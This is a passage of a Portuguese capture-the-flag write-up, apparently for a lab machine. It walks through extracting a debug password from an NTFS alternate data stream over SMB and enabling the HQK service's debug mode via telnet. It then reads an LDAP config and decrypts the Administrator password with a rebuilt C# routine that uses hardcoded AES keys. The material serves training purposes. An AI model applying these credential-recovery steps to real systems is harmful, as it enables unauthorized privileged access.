  HQK_Config_Backup.xml               A      249  Thu Aug  8 19:09:05 2019

                10485247 blocks of size 4096. 6543375 blocks available
smb: \C.Smith\HQK Reporting\> allinfo " Debug Mode Password.txt"
NT_STATUS_OBJECT_NAME_NOT_FOUND getting alt name for \C.Smith\HQK Reporting\ Debug Mode Password.txt
smb: \C.Smith\HQK Reporting\> allinfo "Debug Mode Password.txt"
altname: DEBUGM~1.TXT
create_time:    Thu Aug  8 07:06:12 PM 2019 EDT
access_time:    Thu Aug  8 07:06:12 PM 2019 EDT
write_time:     Thu Aug  8 07:08:17 PM 2019 EDT
change_time:    Thu Aug  8 07:08:17 PM 2019 EDT
attributes: A (20)
stream: [::$DATA], 0 bytes
stream: [:Password:$DATA], 15 bytes
smb: \C.Smith\HQK Reporting\> 

Podemos ver que ele possui outro stream de dados chamado Password, vamos tentar baixa-lo:

smb: get "Debug Mode Password.txt":password
getting file \C.Smith\HQK Reporting\Debug Mode Password.txt:password of size 15 as Debug Mode Password.txt:password (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)

Podemos ver o seguinte conteudo: “WBQ201953D8w”

Vamos tentar voltar ao HQK:

$ telnet 10.10.10.178 4386
Trying 10.10.10.178...
Connected to 10.10.10.178.
Escape character is '^]'.

HQK Reporting Service V1.2

>debug xRxRxPANCAK3SxRxRx

Invalid password entered
>debug WBQ201953D8w

Debug mode enabled. Use the HELP command to view additional commands that are now available
>session

--- Session Information ---

Session ID: 26ecec2e-c357-4860-8f29-d8045141cb6a
Debug: True
Started At: 6/2/2020 4:19:47 AM
Server Endpoint: 10.10.10.178:4386
Client Endpoint: 10.10.16.87:33366
Current Query Directory: C:\Program Files\HQK\ALL QUERIES

>setdir ..

Current directory set to HQK
>list

Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

 QUERY FILES IN CURRENT DIRECTORY

[DIR]  ALL QUERIES
[DIR]  LDAP
[DIR]  Logs
[1]   HqkSvc.exe
[2]   HqkSvc.InstallState
[3]   HQK_Config.xml

Current Directory: HQK
>cd LDAP

Unrecognised command
>setdir LDAP

Current directory set to LDAP
>list

Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

 QUERY FILES IN CURRENT DIRECTORY

[1]   HqkLdap.exe
[2]   Ldap.conf

Current Directory: LDAP
>showquery 2

Domain=nest.local
Port=389
BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local
User=Administrator
Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=

Isso foi um pouco de sorte. Eu precisei navegar com setdir e list no modo debug para entender e encontrar o Ldap.conf. Mais uma vez podemos encontrar uma senha criptografada e um .exedessa vez. O qual pode ser um outro programa VB. Tentando decompilar o mesmo com https://github.com/icsharpcode/AvaloniaILSpy - Se você tiver problemas instalando Avalonia ILSpy.

Se você decompilalo com AvaloniaILSpy usando o .exe como entrada poderá olhar o modolu principal com o seguinte:

        else if (text.StartsWith("Password=", StringComparison.CurrentCultureIgnoreCase))
        {
                ldapSearchSettings.Password = CR.DS(text.Substring(text.IndexOf('=') + 1));
        }

Isto parece a funcão utilizada para decriptografar a senha CR.DS. Se construirmos nossa própria versão:

using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;

public class CR
{
        private const string K = "667912";

        private const string I = "1L1SA61493DRV53Z";

        private const string SA = "1313Rf99";

        public static string DS(string EncryptedString)
        {
                if (string.IsNullOrEmpty(EncryptedString))
                {
                        return string.Empty;
                }
                return RD(EncryptedString, "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256);
        }

        private static string RD(string cipherText, string passPhrase, string saltValue, int passwordIterations, string initVector, int keySize)
        {
                byte[] bytes = Encoding.ASCII.GetBytes(initVector);
                byte[] bytes2 = Encoding.ASCII.GetBytes(saltValue);
                byte[] array = Convert.FromBase64String(cipherText);
                Rfc2898DeriveBytes rfc2898DeriveBytes = new Rfc2898DeriveBytes(passPhrase, bytes2, passwordIterations);
                checked
                {
                        byte[] bytes3 = rfc2898DeriveBytes.GetBytes((int)Math.Round((double)keySize / 8.0));
                        AesCryptoServiceProvider aesCryptoServiceProvider = new AesCryptoServiceProvider();
                        aesCryptoServiceProvider.Mode = CipherMode.CBC;
                        ICryptoTransform transform = aesCryptoServiceProvider.CreateDecryptor(bytes3, bytes);
                        MemoryStream memoryStream = new MemoryStream(array);
                        CryptoStream cryptoStream = new CryptoStream(memoryStream, transform, CryptoStreamMode.Read);
                        byte[] array2 = new byte[array.Length + 1];
                        int count = cryptoStream.Read(array2, 0, array2.Length);
                        memoryStream.Close();
                        cryptoStream.Close();
                        return Encoding.ASCII.GetString(array2, 0, count);
                }
        }
}

public class Program
{
        public static void Main()
        {
                Console.WriteLine(CR.DS("yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4="));
        }
}

A saída será: XtH4nkS4Pl4y1nGX (Utilizamos dotnetfiddle.net novamente)

Podemos conseguir acesso aos arquivos de administrador e a flag de administrator.

Espero que seja útil, Matheus